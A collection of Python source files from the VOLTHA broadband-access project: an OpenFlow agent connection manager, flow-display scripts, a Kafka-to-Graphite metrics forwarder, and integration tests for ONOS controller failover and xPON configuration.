self.vcore_retry_interval = vcore_retry_interval
self.devices_refresh_interval = devices_refresh_interval
self.subscription_refresh_interval = subscription_refresh_interval
self.subscription = None
self.running = False
def start(self):
if self.running:
return
log.debug('starting')
self.running = True
# Start monitoring the vcore grpc channel
reactor.callInThread(self.monitor_vcore_grpc_channel)
# Start monitoring logical devices and manage agents accordingly
reactor.callLater(0, self.monitor_logical_devices)
log.info('started')
return self
def stop(self):
log.debug('stopping')
# clean up all controller connections
for agent in self.agent_map.itervalues():
agent.stop()
self.running = False
self._reset_grpc_attributes()
log.info('stopped')
def resolve_endpoint(self, endpoint):
ip_port_endpoint = endpoint
if endpoint.startswith('@'):
try:
ip_port_endpoint = get_endpoint_from_consul(
self.consul_endpoint, endpoint[1:])
log.info(
'{}-service-endpoint-found'.format(endpoint), address=ip_port_endpoint)
except Exception as e:
log.error('{}-service-endpoint-not-found'.format(endpoint), exception=repr(e))
log.error('committing-suicide')
# Committing suicide in order to let docker restart ofagent
os.system("kill -15 {}".format(os.getpid()))
if ip_port_endpoint:
host, port = ip_port_endpoint.split(':', 2)
return host, int(port)
def _reset_grpc_attributes(self):
log.debug('start-reset-grpc-attributes')
if self.grpc_client is not None:
self.grpc_client.stop()
if self.channel is not None:
del self.channel
self.is_alive = False
self.channel = None
self.subscription = None
self.grpc_client = None
log.debug('stop-reset-grpc-attributes')
def _assign_grpc_attributes(self):
log.debug('start-assign-grpc-attributes')
host, port = self.resolve_endpoint(self.vcore_endpoint)
log.info('revolved-vcore-endpoint', endpoint=self.vcore_endpoint, host=host, port=port)
assert host is not None
assert port is not None
# Establish a connection to the vcore GRPC server
self.channel = grpc.insecure_channel('{}:{}'.format(host, port))
self.is_alive = True
log.debug('stop-assign-grpc-attributes')
@inlineCallbacks
def monitor_vcore_grpc_channel(self):
log.debug('start-monitor-vcore-grpc-channel')
while self.running:
try:
# If a subscription is not yet assigned then establish new GRPC connection
# ... otherwise keep using existing connection details
if self.subscription is None:
self._assign_grpc_attributes()
# Send subscription request to register the current ofagent instance
container_name = self.instance_id
stub = voltha_pb2.VolthaLocalServiceStub(self.channel)
subscription = stub.Subscribe(OfAgentSubscriber(ofagent_id=container_name))
# If the subscriber id matches the current instance
# ... then the subscription has succeeded
if subscription is not None and subscription.ofagent_id == container_name:
if self.subscription is None:
# Keep details on the current GRPC session and subscription
log.debug('subscription-with-vcore-successful', subscription=subscription)
self.subscription = subscription
self.grpc_client = GrpcClient(self, self.channel).start()
# Sleep a bit in between each subscribe
yield asleep(self.subscription_refresh_interval)
# Move on to next subscribe request
continue
# The subscription did not succeed, reset and move on
else:
log.info('subscription-with-vcore-unavailable', subscription=subscription)
except _Rendezvous, e:
log.error('subscription-with-vcore-terminated',exception=e, status=e.code())
except Exception as e:
log.exception('unexpected-subscription-termination-with-vcore', e=e)
# Reset grpc details
# The vcore instance is either not available for subscription
# or a failure occurred with the existing communication.
self._reset_grpc_attributes()
# Sleep for a short period and retry
yield asleep(self.vcore_retry_interval)
log.debug('stop-monitor-vcore-grpc-channel')
@inlineCallbacks
def get_list_of_logical_devices_from_voltha(self):
while self.running:
log.info('retrieve-logical-device-list')
try:
stub = voltha_pb2.VolthaLocalServiceStub(self.channel)
devices = stub.ListLogicalDevices(Empty()).items
for device in devices:
log.info("logical-device-entry", id=device.id, datapath_id=device.datapath_id)
returnValue(devices)
except _Rendezvous, e:
log.error('vcore-communication-failure', exception=e, status=e.code())
if e.code() == StatusCode.UNAVAILABLE:
os.system("kill -15 {}".format(os.getpid()))
except Exception as e:
log.exception('logical-devices-retrieval-failure', exception=e)
log.info('reconnect', after_delay=self.vcore_retry_interval)
yield asleep(self.vcore_retry_interval)
def refresh_agent_connections(self, devices):
"""
Based on the new device list, update the following state in the class:
* agent_map
* datapath_map
* device_id_map
:param devices: full device list freshly received from Voltha
:return: None
"""
# Use datapath ids for deciding what's new and what's obsolete
desired_datapath_ids = set(d.datapath_id for d in devices)
current_datapath_ids = set(datapath_ids[0] for datapath_ids in self.agent_map.iterkeys())
# if identical, nothing to do
if desired_datapath_ids == current_datapath_ids:
return
# ... otherwise calculate differences
to_add = desired_datapath_ids.difference(current_datapath_ids)
to_del = current_datapath_ids.difference(desired_datapath_ids)
# remove what we don't need
for datapath_id in to_del:
self.delete_agent(datapath_id)
# start new agents as needed
for device in devices:
if device.datapath_id in to_add:
self.create_agent(device)
log.debug('updated-agent-list', count=len(self.agent_map))
log.debug('updated-device-id-to-datapath-id-map',
map=str(self.device_id_to_datapath_id_map))
def create_agent(self, device):
datapath_id = device.datapath_id
device_id = device.id
for controller_endpoint in self.controller_endpoints:
agent = Agent(controller_endpoint, datapath_id,
device_id, self.grpc_client, self.enable_tls,
self.key_file, self.cert_file)
agent.start()
self.agent_map[(datapath_id,controller_endpoint)] = agent
self.device_id_to_datapath_id_map[device_id] = datapath_id
def delete_agent(self, datapath_id):
for controller_endpoint in self.controller_endpoints:
agent = self.agent_map[(datapath_id,controller_endpoint)]
device_id = agent.get_device_id()
agent.stop()
del self.agent_map[(datapath_id,controller_endpoint)]
del self.device_id_to_datapath_id_map[device_id]
@inlineCallbacks
def monitor_logical_devices(self):
log.debug('start-monitor-logical-devices')
while self.running:
log.info('monitoring-logical-devices')
# should change to a gRPC streaming call
# see https://jira.opencord.org/browse/CORD-821
try:
if self.channel is not None and self.grpc_client is not None:
# get current list from Voltha
devices = yield self.get_list_of_logical_devices_from_voltha()
# update agent list and mapping tables as needed
self.refresh_agent_connections(devices)
else:
log.info('vcore-communication-unavailable')
# wait before next poll
yield asleep(self.devices_refresh_interval)
except _Rendezvous, e:
log.error('vcore-communication-failure', exception=repr(e), status=e.code())
except Exception as e:
log.exception('unexpected-vcore-communication-failure', exception=repr(e))
log.debug('stop-monitor-logical-devices')
def forward_packet_in(self, device_id, ofp_packet_in):
datapath_id = self.device_id_to_datapath_id_map.get(device_id, None)
if datapath_id:
for controller_endpoint in self.controller_endpoints:
agent = self.agent_map[(datapath_id, controller_endpoint)]
agent.forward_packet_in(ofp_packet_in)
def forward_change_event(self, device_id, event):
datapath_id = self.device_id_to_datapath_id_map.get(device_id, None)
if datapath_id:
for controller_endpoint in self.controller_endpoints:
agent = self.agent_map[(datapath_id, controller_endpoint)]
agent.forward_change_event(event)
```
#### File: voltha/scripts/scriptbase.py
```python
import os
import sys
import requests
from termcolor import cprint, colored
from os.path import join as pjoin
def p_cookie(cookie):
cookie = str(cookie)
if len(cookie) > 8:
return cookie[:6] + '...'
else:
return cookie
'''
OFPP_NORMAL = 0x7ffffffa; /* Forward using non-OpenFlow pipeline. */
OFPP_FLOOD = 0x7ffffffb; /* Flood using non-OpenFlow pipeline. */
OFPP_ALL = 0x7ffffffc; /* All standard ports except input port. */
OFPP_CONTROLLER = 0x7ffffffd; /* Send to controller. */
OFPP_LOCAL = 0x7ffffffe; /* Local openflow "port". */
OFPP_ANY = 0x7fffffff; /* Special value used in some requests when
'''
def p_port(port):
if port & 0x7fffffff == 0x7ffffffa:
return 'NORMAL'
elif port & 0x7fffffff == 0x7ffffffb:
return 'FLOOD'
elif port & 0x7fffffff == 0x7ffffffc:
return 'ALL'
elif port & 0x7fffffff == 0x7ffffffd:
return 'CONTROLLER'
elif port & 0x7fffffff == 0x7ffffffe:
return 'LOCAL'
elif port & 0x7fffffff == 0x7fffffff:
return 'ANY'
else:
return str(port)
def p_vlan_vid(vlan_vid):
if vlan_vid == 0:
return 'untagged'
assert vlan_vid & 4096 == 4096
return str(vlan_vid - 4096)
def p_ipv4(x):
return '.'.join(str(v) for v in [
(x >> 24) & 0xff, (x >> 16) & 0xff, (x >> 8) & 0xff, x & 0xff
])
field_printers = {
'IN_PORT': lambda f: (100, 'in_port', p_port(f['port'])),
'VLAN_VID': lambda f: (101, 'vlan_vid', p_vlan_vid(f['vlan_vid'])),
'VLAN_PCP': lambda f: (102, 'vlan_pcp', str(f['vlan_pcp'])),
'ETH_TYPE': lambda f: (103, 'eth_type', '%X' % f['eth_type']),
'IPV4_DST': lambda f: (104, 'ipv4_dst', p_ipv4(f['ipv4_dst'])),
'IP_PROTO': lambda f: (105, 'ip_proto', str(f['ip_proto']))
}
def p_field(field):
assert field['oxm_class'].endswith('OPENFLOW_BASIC')
ofb = field['ofb_field']
assert not ofb['has_mask']
type = ofb['type'][len('OFPXMT_OFB_'):]
weight, field_name, value = field_printers[type](ofb)
return 1000 + weight, 'set_' + field_name, value
action_printers = {
'SET_FIELD': lambda a: p_field(a['set_field']['field']),
'POP_VLAN': lambda a: (2000, 'pop_vlan', 'Yes'),
'PUSH_VLAN': lambda a: (2001, 'push_vlan', '%x' % a['push']['ethertype']),
'GROUP': lambda a: (3000, 'group', p_port(a['group']['group_id'])),
'OUTPUT': lambda a: (4000, 'output', p_port(a['output']['port'])),
}
class ScriptBase(object):
usage = 'To be filled by derived class'
deep_header = {'get-depth': '-1'}
def __init__(self):
self.voltha_base_url = os.environ.get('VOLTHA_BASE_URL')
if self.voltha_base_url is None:
self.err(1)
def err(self, code, msg=None):
if msg is None:
msg = self.usage
print >> sys.stderr, msg
sys.exit(code)
def fetch_logical_device_info(self, base_url, logical_device_id):
url = pjoin(base_url, 'logical_devices', logical_device_id)
res = requests.get(url, headers=self.deep_header)
if res.ok:
return res.json()
else:
self.err('could not fetch logical device at {}: {}'.format(
url, res.text))
def fetch_device_info(self, base_url, device_id):
url = pjoin(base_url, 'devices', device_id)
res = requests.get(url, headers=self.deep_header)
if res.ok:
return res.json()
else:
self.err('could not fetch device at {}: {}'.format(url, res.text))
def print_flows(self, what, id, type, flows, groups):
print
print ''.join([
'{} '.format(what),
colored(id, color='green', attrs=['bold']),
' (type: ',
colored(type, color='blue'),
')'
])
print 'Flows:'
max_field_lengths = {}
field_names = {}
def update_max_length(field_key, string):
length = len(string)
if length > max_field_lengths.get(field_key, 0):
max_field_lengths[field_key] = length
def add_field_type(field_key, field_name):
if field_key not in field_names:
field_names[field_key] = field_name
update_max_length(field_key, field_name)
else:
assert field_names[field_key] == field_name
cell_values = {}
# preprocess data
for i, flow in enumerate(flows):
def add_field(field_key, field_name, value):
add_field_type(field_key, field_name)
row = cell_values.setdefault(i, {})
row[field_key] = value
update_max_length(field_key, value)
add_field(0, 'table_id', value=str(flow['table_id']))
add_field(1, 'priority', value=str(flow['priority']))
add_field(2, 'cookie', p_cookie(flow['cookie']))
assert flow['match']['type'] == 'OFPMT_OXM'
for field in flow['match']['oxm_fields']:
assert field['oxm_class'].endswith('OPENFLOW_BASIC')
ofb = field['ofb_field']
assert not ofb['has_mask'], 'masked match not handled yet' # TODO
type = ofb['type'][len('OFPXMT_OFB_'):]
add_field(*field_printers[type](ofb))
for instruction in flow['instructions']:
if instruction['type'] == 4:
for action in instruction['actions']['actions']:
type = action['type'][len('OFPAT_'):]
add_field(*action_printers[type](action))
# print header
field_keys = sorted(field_names.keys())
def p_sep():
print '+' + '+'.join(
[(max_field_lengths[k] + 2) * '-' for k in field_keys]) + '+'
p_sep()
print '| ' + ' | '.join(
'%%%ds' % max_field_lengths[k] % field_names[k]
for k in field_keys) + ' |'
p_sep()
# print values
for i in xrange(len(flows)):
row = cell_values[i]
cprint('| ' + ' | '.join(
'%%%ds' % max_field_lengths[k] % row.get(k, '')
for k in field_keys
) + ' |')
if not ((i + 1) % 3):
p_sep()
if ((i + 1) % 3):
p_sep()
# TODO groups TBF
assert len(groups) == 0
```
#### File: voltha/scripts/show_logical_device_flows.py
```python
import os
import sys
from scripts.scriptbase import ScriptBase
class _(ScriptBase):
usage = """
Usage: {} <logical-device-id>
Make sure you have VOLTHA_BASE_URL environment variable
defined, examples:
export VOLTHA_BASE_URL=http://localhost:8881/api/v1
or
export VOLTHA_BASE_URL=http://10.100.192.220:8881/api/v1
""".format(sys.argv[0])
def main(self):
if len(sys.argv) != 2:
self.err(1)
logical_device_id = sys.argv[1]
logical_device = self.fetch_logical_device_info(
self.voltha_base_url, logical_device_id)
self.print_flows(
'Logical device',
logical_device_id,
type='n/a',
flows=logical_device['flows']['items'],
groups=logical_device['flow_groups']['items']
)
if __name__ == '__main__':
_().main()
```
#### File: voltha/shovel/main.py
```python
from optparse import OptionParser
import simplejson
import structlog
from kafka import KafkaConsumer
import pickle
import struct
import socket
import sys
import time
from kafka.consumer.fetcher import ConsumerRecord
from kafka.errors import KafkaError
from common.utils.consulhelpers import get_endpoint_from_consul
log = structlog.get_logger()
class Graphite:
def __init__(self, host='localhost', port=2004, retry=5, delay=3,
backoff=2, timeout=10):
self.host = host
self.port = port
self.retry = retry
self.delay = delay
self.backoff = backoff
self.timeout = timeout
# Create initial socket
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.settimeout(self.timeout)
# Initiate connection
self.connect()
def _backoff(self, retry, delay, backoff):
"""Exponential backoff."""
retry -= 1
if retry == 0:
raise Exception('Timeout')
time.sleep(delay)
delay *= backoff
return retry, delay, backoff
def _retry(self, exception, func, *args):
"""
Retry calling the func catching a tuple of exceptions with backoff.
"""
retry = self.retry
delay = self.delay
backoff = self.backoff
while retry > 0:
try:
return func(*args)
except exception, e:
retry, delay, backoff = self._backoff(retry, delay, backoff)
def connect(self):
"""Connect to graphite."""
retry = self.retry
backoff = self.backoff
delay = self.delay
while retry > 0:
try:
# Attempt to connect to Graphite, break if success
self.conn.connect((self.host, self.port))
break
except socket.error, e:
# Ditch this socket. Create a new one
self.conn.close()
self.conn.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
def close(self):
"""Close connection go Graphite."""
self.conn.close()
def send(self, data, retry=3):
"""Send data to graphite."""
retry = self.retry
backoff = self.backoff
delay = self.delay
# Attempt to send any data in the queue
while retry > 0:
# Check socket
if not self.conn:
# Attempt to restablish connection
self.close()
self.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
continue
try:
# Send data to socket
self.conn.sendall(data)
break
except socket.error, e:
self.close()
self.connect()
retry, delay, backoff = self._backoff(retry, delay, backoff)
continue
def _pickle(batch):
"""Pickle metrics into graphite format."""
payload = pickle.dumps(batch)
header = struct.pack("!L", len(payload))
message = header + payload
return message
def _convert(msg):
"""Convert a graphite key value string to pickle."""
def extract_slice(ts, prefixes):
for object_path, metrics in prefixes.iteritems():
for metric_name, value in metrics['metrics'].iteritems():
path = '.'.join((object_path, metric_name))
yield (path, ts, value)
assert isinstance(msg, dict)
type = msg.get('type')
if type == 'slice':
extractor, kw = extract_slice, dict(ts=msg['ts'],
prefixes=msg['prefixes'])
else:
raise Exception('Unknown format')
batch = []
for path, timestamp, value in extractor(**kw):
batch.append((path, (timestamp, value)))
return batch
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-K", "--kafka", dest="kafka",
default="localhost:9092", help="Kafka bootstrap server")
parser.add_option("-c", "--consul", dest="consul",
default="localhost:8500",
help="Consul server (needed if kafak server is specifed"
"with '@kafka' value)")
parser.add_option("-t", "--topic", dest="topic", help="Kafka topic")
parser.add_option("-H", "--host", dest="graphite_host",
default="localhost", help="Graphite host")
parser.add_option("-p", "--port", dest="graphite_port", type=int,
default=2004, help="Graphite port")
(options, args) = parser.parse_args()
# Assign OptParse variables
kafka = options.kafka
consul = options.consul
topic = options.topic
host = options.graphite_host
port = options.graphite_port
# Connect to Graphite
try:
graphite = Graphite(host, port)
except socket.error, e:
print "Could not connect to graphite host %s:%s" % (host, port)
sys.exit(1)
except socket.gaierror, e:
print "Invalid hostname for graphite host %s" % (host)
sys.exit(1)
log.info('Connected to graphite at {}:{}'.format(host, port))
# Resolve Kafka value if it is based on consul lookup
if kafka.startswith('@'):
kafka = get_endpoint_from_consul(consul, kafka[1:])
# Connect to Kafka
try:
log.info('connect-to-kafka', kafka=kafka)
consumer = KafkaConsumer(topic, bootstrap_servers=kafka)
except KafkaError, e:
log.error('failed-to-connect-to-kafka', kafka=kafka, e=e)
sys.exit(1)
# Consume Kafka topic
log.info('start-loop', topic=topic)
for record in consumer:
assert isinstance(record, ConsumerRecord)
msg = record.value
try:
batch = _convert(simplejson.loads(msg))
except Exception, e:
log.warn('unknown-format', msg=msg)
continue
pickled = _pickle(batch)
graphite.send(pickled)
log.debug('sent', batch_len=len(batch))
log.info('exited')
```
#### File: itests/ofagent/test_ofagent_multicontroller_failover.py
```python
from time import time, sleep
import logging
import os
import json
from unittest import TestCase,main
this_dir = os.path.abspath(os.path.dirname(__file__))
from tests.itests.docutests.test_utils import run_command_to_completion_with_raw_stdout
from voltha.protos.device_pb2 import Device
from google.protobuf.json_format import MessageToDict
from tests.itests.voltha.rest_base import RestBase
from common.utils.consulhelpers import get_endpoint_from_consul
log = logging.getLogger(__name__)
DOCKER_COMPOSE_FILE = "compose/docker-compose-ofagent-test.yml"
LOCAL_CONSUL = "localhost:8500"
command_defs = dict(
docker_images="docker images",
docker_stop="docker stop",
docker_rm="docker rm",
docker_voltha_logs="docker logs -f compose_voltha_1",
docker_compose_logs="docker-compose -f {} logs".format(
DOCKER_COMPOSE_FILE),
docker_stop_and_remove_all_containers="docker stop `docker ps -q` ; "
"docker rm `docker ps -a -q`",
docker_compose_start_all="docker-compose -f {} up -d "
.format(DOCKER_COMPOSE_FILE),
docker_compose_stop="docker-compose -f {} stop"
.format(DOCKER_COMPOSE_FILE),
docker_compose_rm_f="docker-compose -f {} rm -f"
.format(DOCKER_COMPOSE_FILE),
docker_compose_ps="docker-compose -f {} ps".format(DOCKER_COMPOSE_FILE),
docker_ps="docker ps",
onos_form_cluster="./tests/itests/ofagent/onos-form-cluster",
onos1_ip="docker inspect --format '{{ .NetworkSettings.Networks.compose_default.IPAddress }}' onos1",
onos2_ip ="docker inspect --format '{{ .NetworkSettings.Networks.compose_default.IPAddress }}' onos2",
onos3_ip="docker inspect --format '{{ .NetworkSettings.Networks.compose_default.IPAddress }}' onos3",
onos1_devices="curl -u karaf:karaf http://localhost:8181/onos/v1/devices",
onos2_devices="curl -u karaf:karaf http://localhost:8182/onos/v1/devices",
onos3_devices="curl -u karaf:karaf http://localhost:8183/onos/v1/devices")
class TestOFAGENT_MultiController(RestBase):
# Test OFAgent Support for Multiple controller
def setUp(self):
# Run Voltha,OFAgent,3 ONOS and form ONOS cluster.
print "Starting all containers ..."
cmd = command_defs['docker_compose_start_all']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for all containers to be ready ..."
sleep(80)
cmd = command_defs['onos1_ip']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos1_ip = out
print "ONOS1 IP is {}".format(onos1_ip)
cmd = command_defs['onos2_ip']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos2_ip = out
print "ONOS2 IP is {}".format(onos2_ip)
cmd = command_defs['onos3_ip']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos3_ip = out
print "ONOS3 IP is {}".format(onos3_ip)
cmd = command_defs['onos_form_cluster'] + ' {} {} {}'.format(onos1_ip.strip(),onos2_ip.strip(),onos3_ip.strip())
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Cluster Output :{} ".format(out)
self.get_rest_endpoint()
def tearDown(self):
# Stopping and Removing Voltha,OFAgent,3 ONOS.
print "Stopping and removing all containers ..."
cmd = command_defs['docker_compose_stop']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for all containers to be stopped ..."
sleep(1)
cmd = command_defs['docker_compose_rm_f']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
def wait_till(self, msg, predicate, interval=0.1, timeout=5.0):
deadline = time() + timeout
while time() < deadline:
if predicate():
return
sleep(interval)
self.fail('Timed out while waiting for condition: {}'.format(msg))
def get_rest_endpoint(self):
# Retrieve details on the REST entry point
rest_endpoint = get_endpoint_from_consul(LOCAL_CONSUL, 'envoy-8443')
# Construct the base_url
self.base_url = 'https://' + rest_endpoint
def add_device(self):
print "Adding device"
device = Device(
type='simulated_olt',
mac_address='01:0c:e2:31:40:00'
)
device = self.post('/api/v1/devices', MessageToDict(device),
expected_http_code=200)
print "Added device - id:{}, type:{}".format(device['id'], device['type'])
sleep(5)
return device
def enable_device(self, device_id):
print "Enabling device - id:{}".format(device_id)
path = '/api/v1/devices/{}'.format(device_id)
self.post(path + '/enable', expected_http_code=200)
device = self.get(path)
self.assertEqual(device['admin_state'], 'ENABLED')
self.wait_till(
'admin state moves to ACTIVATING or ACTIVE',
lambda: self.get(path)['oper_status'] in ('ACTIVATING', 'ACTIVE'),
timeout=0.5)
# eventually, it shall move to active state and by then we shall have
# device details filled, connect_state set, and device ports created
self.wait_till(
'admin state ACTIVE',
lambda: self.get(path)['oper_status'] == 'ACTIVE',
timeout=0.5)
device = self.get(path)
images = device['images']
image = images['image']
image_1 = image[0]
version = image_1['version']
self.assertNotEqual(version, '')
self.assertEqual(device['connect_status'], 'REACHABLE')
ports = self.get(path + '/ports')['items']
self.assertEqual(len(ports), 2)
sleep(30)
print "Enabled device - id:{}".format(device_id)
def test_ofagent_controller_failover(self):
olt_device = self.add_device()
print "Output of ADD OLT is {} {} {}".format(olt_device, type(olt_device), olt_device['id'])
sleep(5)
self.enable_device(olt_device['id'])
print "Waiting for OLT device to be activated ..."
sleep(80)
cmd = command_defs['onos1_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos1_devices = json.loads(out)
onos1_role = onos1_devices['devices'][0]['role']
print "Role of ONOS1 is {}".format(onos1_role)
cmd = command_defs['onos2_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos2_devices = json.loads(out)
onos2_role = onos2_devices['devices'][0]['role']
print "Role of ONOS2 is {}".format(onos2_role)
cmd = command_defs['onos3_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos3_devices = json.loads(out)
onos3_role = onos3_devices['devices'][0]['role']
print "Role of ONOS3 is {}".format(onos3_role)
if onos1_role == "MASTER":
cmd = command_defs['docker_stop']+ ' onos1'
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for ONOS to Elect New Master"
sleep(20)
cmd = command_defs['onos2_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos2_devices = json.loads(out)
onos2_role = onos2_devices['devices'][0]['role']
print "Role of ONOS2 is {}".format(onos2_role)
cmd = command_defs['onos3_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos3_devices = json.loads(out)
onos3_role = onos3_devices['devices'][0]['role']
print "Role of ONOS3 is {}".format(onos3_role)
assert (onos3_role == "MASTER" or onos2_role == "MASTER"), "Exception,New Master Election Failed"
elif onos2_role == "MASTER":
cmd = command_defs['docker_stop']+ ' onos2'
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for ONOS to Elect New Master"
sleep(20)
cmd = command_defs['onos1_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos1_devices = json.loads(out)
onos1_role = onos1_devices['devices'][0]['role']
print "Role of ONOS1 is {}".format(onos1_role)
cmd = command_defs['onos3_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos3_devices = json.loads(out)
onos3_role = onos3_devices['devices'][0]['role']
print "Role of ONOS3 is {}".format(onos3_role)
assert (onos3_role == "MASTER" or onos1_role == "MASTER"), "Exception,New Master Election Failed"
elif onos3_role == "MASTER":
cmd = command_defs['docker_stop']+ ' onos3'
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
print "Waiting for ONOS to Elect New Master"
sleep(20)
cmd = command_defs['onos1_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos1_devices = json.loads(out)
onos1_role = onos1_devices['devices'][0]['role']
print "Role of ONOS1 is {}".format(onos1_role)
cmd = command_defs['onos2_devices']
out, err, rc = run_command_to_completion_with_raw_stdout(cmd)
self.assertEqual(rc, 0)
onos2_devices = json.loads(out)
onos2_role = onos2_devices['devices'][0]['role']
print "Role of ONOS2 is {}".format(onos2_role)
assert (onos1_role == "MASTER" or onos2_role == "MASTER"), "Exception,New Master Election Failed"
```
#### File: itests/voltha/test_voltha_xpon.py
```python
from tests.itests.voltha.rest_base import RestBase
from google.protobuf.json_format import MessageToDict, ParseDict
import unittest
from voltha.protos import bbf_fiber_base_pb2 as fb
from voltha.protos.device_pb2 import Device
from voltha.protos import bbf_fiber_gemport_body_pb2 as gemport
from voltha.protos import bbf_fiber_tcont_body_pb2 as tcont
from voltha.protos import bbf_fiber_traffic_descriptor_profile_body_pb2 as tdp
from common.utils.consulhelpers import get_endpoint_from_consul
'''
These tests use the Ponsim OLT to verify create, update, and delete
functionalities of ChannelgroupConfig, ChannelpartitionConfig,
ChannelpairConfig, ChannelterminationConfig, VOntAni, OntAni, and VEnets
for xPON
The prerequisite for this test are:
1. voltha ensemble is running
docker-compose -f compose/docker-compose-system-test.yml up -d
2. ponsim olt is running with PONSIM-OLT
sudo -s
. ./env.sh
./ponsim/main.py -v
'''
device_type = 'ponsim_olt'
host_and_port = '172.17.0.1:50060'
scenario = [
{'cg-add': {
'pb2': fb.ChannelgroupConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Manhattan",
"description": "Channel Group for Manhattan.."
},
"data": {
"polling_period": 100,
"system_id": "000000",
"raman_mitigation": "RAMAN_NONE"
},
"name": "Manhattan"
}
}
},
{'cpart-add': {
'pb2': fb.ChannelpartitionConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Freedom Tower",
"description":"Channel Partition for Freedom Tower in Manhattan"
},
"data": {
"differential_fiber_distance": 20,
"closest_ont_distance": 0,
"fec_downstream": False,
"multicast_aes_indicator": False,
"authentication_method": "SERIAL_NUMBER",
"channelgroup_ref": "Manhattan"
},
"name": "Freedom Tower"
}
}
},
{'cpair-add': {
'pb2': fb.ChannelpairConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "PON port",
"description": "Channel Pair for Freedom Tower"
},
"data": {
"channelpair_linerate": "down_10_up_10",
"channelpair_type": "channelpair",
"channelgroup_ref": "Manhattan",
"gpon_ponid_interval": 0,
"channelpartition_ref": "Freedom Tower",
"gpon_ponid_odn_class": "CLASS_A"
},
"name": "PON port"
}
}
},
{'cterm-add': {
'pb2': fb.ChannelterminationConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "PON port",
"description": "Channel Termination for Freedom Tower"
},
"data": {
"channelpair_ref": "PON port",
"location": "Freedom Tower OLT"
},
"name": "PON port"
}
}
},
{'vontani-add': {
'pb2': fb.VOntaniConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Golden User",
"description": "Golden User in Freedom Tower"
},
"data": {
"preferred_chanpair": "PON port",
"expected_serial_number": "PSMO00000001",
"parent_ref": "Freedom Tower",
"onu_id": 1
},
"name": "Golden User"
}
}
},
{'ontani-add': {
'pb2': fb.OntaniConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Golden User",
"description": "Golden User in Freedom Tower"
},
"data": {
"upstream_fec_indicator": True,
"mgnt_gemport_aes_indicator": False
},
"name": "Golden User"
}
}
},
{'venet-add': {
'pb2': fb.VEnetConfig(),
'rpc': {
"interface": {
"enabled": True,
"name": "Enet UNI 1",
"description": "Ethernet port - 1"
},
"data": {
"v_ontani_ref": "Golden User"
},
"name": "Enet UNI 1"
}
}
},
{'tdp-add': {
'pb2': tdp.TrafficDescriptorProfileData(),
'rpc': {
"name": "TDP 1",
"assured_bandwidth": "500000",
"additional_bw_eligibility_indicator": \
"ADDITIONAL_BW_ELIGIBILITY_INDICATOR_NONE",
"fixed_bandwidth": "100000",
"maximum_bandwidth": "1000000",
}
}
},
{'tcont-add': {
'pb2': tcont.TcontsConfigData(),
'rpc': {
"interface_reference": "Golden User",
"traffic_descriptor_profile_ref": "TDP 1",
"name": "TCont 1"
}
}
},
{'tcont-add-with-alloc-id': {
'pb2': tcont.TcontsConfigData(),
'rpc': {
"interface_reference": "Golden User",
"traffic_descriptor_profile_ref": "TDP 1",
"name": "TCont 2",
"alloc_id": 1234
}
}
},
{'tcont-add-with-alloc-id-zero': {
'pb2': tcont.TcontsConfigData(),
'rpc': {
"interface_reference": "Golden User",
"traffic_descriptor_profile_ref": "TDP 1",
"name": "TCont 3",
"alloc_id": 0
}
}
},
{'gemport-add': {
'pb2': gemport.GemportsConfigData(),
'rpc': {
"aes_indicator": True,
"name": "GEMPORT 1",
"traffic_class": 0,
"itf_ref": "Enet UNI 1",
"tcont_ref": "TCont 1",
}
}
},
{'gemport-add-with-gemport-id': {
'pb2': gemport.GemportsConfigData(),
'rpc': {
"aes_indicator": True,
"name": "GEMPORT 2",
"traffic_class": 0,
"itf_ref": "Enet UNI 1",
"tcont_ref": "TCont 2",
"gemport_id": 2345
}
}
},
{'gemport-add-with-gemport-id-zero': {
'pb2': gemport.GemportsConfigData(),
'rpc': {
"aes_indicator": True,
"name": "GEMPORT 2",
"traffic_class": 0,
"itf_ref": "Enet UNI 1",
"tcont_ref": "TCont 2",
"gemport_id": 0
}
}
}
]
#for ordering the test cases
id = 3
LOCAL_CONSUL = "localhost:8500"
# Retrieve details of the REST entry point
rest_endpoint = get_endpoint_from_consul(LOCAL_CONSUL, 'envoy-8443')
# Construct the base_url
BASE_URL = 'https://' + rest_endpoint
class GlobalPreChecks(RestBase):
base_url = BASE_URL
# def test_000_get_root(self):
